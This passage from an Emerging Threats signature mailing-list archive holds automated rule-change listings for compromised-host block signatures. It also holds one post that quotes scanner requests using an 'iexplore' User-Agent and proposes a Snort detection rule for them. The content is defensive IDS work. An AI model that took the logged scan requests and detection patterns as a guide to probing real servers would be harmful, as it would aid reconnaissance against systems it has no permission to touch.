        2510524 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510525 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510526 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510527 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510528 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510529 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510530 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510531 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510532 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510533 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510534 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510535 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510536 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510537 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510538 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510539 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510540 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510541 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (271) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From mike.cox52 at gmail.com  Sun Dec 13 15:08:48 2009
From: mike.cox52 at gmail.com (Mike Cox)
Date: Sun, 13 Dec 2009 14:08:48 -0600
Subject: [Emerging-Sigs] Suspicious User-Agent: iexplore
Message-ID: <6116b9e20912131208u4f80ad00v6eb860e0e0719c2d@mail.gmail.com>

I'm seeing some scanning using the User-Agent "iexplore":

GET /css/genimg.php?action=update HTTP/1.0" 404 212 "-" "iexplore
GET /bn/file.php?action=update HTTP/1.0" 404 209 "-" "iexplore

Therefore I propose the following:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN
Suspicious User-Agent (iexplore)"; flow:established,to_server;
content:"|0d 0a|User-Agent\: iexplore|0d 0a|"; nocase;
classtype:attempted-recon; sid:2000xxx; rev:1;)

Mike Cox

From emerging at emergingthreats.net  Sun Dec 13 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sun, 13 Dec 2009 16:00:12 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091213210012.DCFD14504D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sun Dec 13 16:00:12 2009 [***]

[*] Rules modifications: [*]
    None.

[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (80):
        2500438 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500439 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500440 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500441 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500442 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500443 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500444 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500445 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500446 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500447 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500448 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500449 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500450 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500451 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500452 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500453 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500454 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500455 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500456 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500457 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500458 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500459 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500460 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500461 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500462 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500463 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500464 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500465 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500466 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500467 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500468 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500469 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500470 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500471 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500472 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500473 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500474 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500475 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500476 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500477 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510438 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510439 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510440 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510441 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510442 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510443 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510444 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510445 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510446 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510447 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510448 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510449 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510450 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510451 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510452 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510453 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510454 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510455 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510456 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510457 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510458 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510459 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510460 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510461 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510462 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510463 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510464 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510465 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510466 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510467 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510468 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510469 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510470 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510471 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510472 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510473 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510474 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510475 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510476 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510477 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (80):
        2500438 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500439 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500440 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500441 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500442 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500443 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500444 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500445 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500446 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500447 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500448 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500449 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500450 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500451 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500452 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500453 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500454 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500455 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500456 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500457 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500458 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500459 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500460 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500461 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500462 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500463 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500464 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500465 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500466 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500467 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500468 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500469 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500470 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500471 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500472 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500473 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500474 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500475 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500476 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500477 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510438 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510439 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510440 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510441 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510442 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510443 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510444 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510445 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510446 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510447 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510448 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510449 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510450 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510451 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510452 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510453 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510454 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510455 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510456 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510457 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510458 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510459 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510460 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510461 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510462 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510463 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510464 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510465 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510466 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510467 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510468 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510469 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510470 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510471 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510472 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510473 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510474 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510